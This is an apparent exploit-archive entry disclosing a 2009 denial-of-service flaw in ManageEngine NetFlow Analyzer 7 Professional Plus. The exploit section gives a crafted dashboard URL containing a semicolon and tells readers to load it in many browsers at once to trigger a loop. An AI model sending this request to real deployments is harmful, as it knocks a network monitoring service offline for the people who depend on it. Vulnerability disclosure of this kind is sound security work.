The NetFlow Analyzer 7 Professional Plus remote looping DoS

2009.12.14

Credit: Asheesh Anaconda

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

*************************************************************************************************************************
                         Automated  Looping Problem on NetFlow Analyzer 7 professional Plus
**************************************************************************************************************************

# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
# Company AKSIT Services
# Vulnerable Software:ManageEngine NetFlow Analyzer 7 professional Plus 
# Date:19-Nov-2009
# Tested on Window os
# Browser Mozilla/IE8
#About Software-ManageEngine NetFlow Analyzer is a traffic analysis and network forensic tool that leveroges 
                on the wide range of management technologies that are part of Cisco IOS, As the only product that supports 
                Cisco NetFlow, Cisco NBAR , CiscoCBQoS



Exploit: Open different browser 10to 15 and just copy and paste link on your browser 
           http://localhost:8080/;netflow/jspui/dashBoard.do?dId=1

Reason:Semicolon ";" Input validation in Propely Done 

          

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

The NetFlow Analyzer 7 Professional Plus remote looping DoS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.